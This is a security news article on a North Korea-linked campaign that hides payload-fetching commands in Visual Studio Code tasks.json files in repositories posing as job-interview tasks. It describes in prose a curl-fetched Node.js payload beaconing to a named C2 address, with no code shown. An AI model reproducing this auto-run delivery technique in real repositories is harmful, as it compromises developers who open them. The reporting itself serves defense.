Threat actors linked to North Korea have continued to expand their attack capabilities by weaponizing Microsoft Visual Studio Code, one of the world’s most popular code editors.
The Contagious Interview campaign has evolved significantly, shifting from traditional social engineering tactics to targeting developers through trusted development environments.
This new approach marks a concerning escalation in how adversaries exploit legitimate software tools to deliver sophisticated malware directly onto victim systems.
The attack chain begins when developers unknowingly clone malicious repositories, often disguised as recruitment assignments or technical job interviews.
The attack represents a shift in tactics beyond previously documented ClickFix-based delivery methods. Rather than relying on suspicious email links, attackers now embed malicious commands within Visual Studio Code configuration files.
.webp "Hackers Extensively Abuses Visual Studio Code to Execute Malicious Payloads on Victim System 2")
When a victim opens a compromised repository in Visual Studio Code and grants repository trust—a standard workflow action—the application automatically processes the repository’s tasks.json configuration file.
This file can contain embedded commands that execute arbitrary code on the system, effectively bypassing user awareness.
Jamf analysts and researchers identified additional abuse of Visual Studio Code’s task configuration files in December, discovering dictionary files containing heavily obfuscated JavaScript code.
This JavaScript executes silently when a victim opens a malicious repository. The security researchers also documented how attackers introduced increasingly sophisticated obfuscation techniques to evade detection and analysis.
The Infection Mechanism and Execution Flow
The infection begins when a developer clones and opens a malicious Git repository hosted on GitHub or GitLab.
On macOS systems, the malware uses a background shell command combining nohup bash with curl to retrieve a JavaScript payload remotely from Vercel-hosted infrastructure.
The payload executes directly in the Node.js runtime, allowing the attack to continue even if Visual Studio Code closes.
.webp "Hackers Extensively Abuses Visual Studio Code to Execute Malicious Payloads on Victim System 4")
This persistence mechanism is particularly effective because it operates independently from the editor’s process.
Once executed, the JavaScript payload establishes a persistent connection to a command-and-control server located at 87.236.177.93, beaconing every five seconds.
.webp "Hackers Extensively Abuses Visual Studio Code to Execute Malicious Payloads on Victim System 5")
The malware collects system information including hostname, MAC addresses, and operating system details, then sends this data to attackers for further tasking.
The payload maintains a persistent execution loop capable of accepting additional JavaScript instructions from the C2 server, enabling attackers to execute arbitrary commands and maintain long-term access.
Developers should carefully review repository contents before marking them as trusted and scrutinize tasks.json files for suspicious configurations that could indicate malicious intent.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
